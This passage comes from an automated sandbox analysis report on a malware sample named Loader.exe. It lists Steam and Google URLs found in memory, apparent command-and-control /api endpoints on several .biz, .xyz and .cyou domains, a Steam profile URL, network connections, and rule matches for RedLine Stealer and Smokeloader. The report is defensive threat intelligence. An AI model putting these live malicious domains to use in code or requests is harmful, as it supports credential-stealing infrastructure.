      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/
      Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
      Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api#
      Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz:443/api
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/
      Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
      Source: Loader.exe, 00000000.00000003.1800647255.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800804536.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/
      Source: Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
      Source: Loader.exe, 00000000.00000003.1800647255.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800804536.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/h
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: Loader.exe, Loader.exe, 00000000.00000003.1775134722.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
      Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
      Source: Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api;
      Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apij
      Source: Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/l#
      Source: Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/pi
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/T#
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.0000000000653000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900l
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: Loader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
      Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api
      Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api6(8
      Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api=(#
      Source: Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/apio
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49733 version: TLS 1.2

      System Summary

      barindex
      Source: 00000000.00000002.2140034005.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.2140310460.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0067B4B90_3_0067B4B9
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0067B4B90_3_0067B4B9
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0067B4B90_3_0067B4B9
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0067B4B90_3_0067B4B9
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CE710_3_0068CE71
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CE710_3_0068CE71
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D2540_3_0068D254
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D2540_3_0068D254
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CC280_3_0068CC28
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068CC280_3_0068CC28
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D4240_3_0068D424
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D4240_3_0068D424
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D33C0_3_0068D33C
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D33C0_3_0068D33C
      Source: C:\Users\user\Desktop\Loader.exeCode function: 0_3_0068D0F80_3_0068D0F8
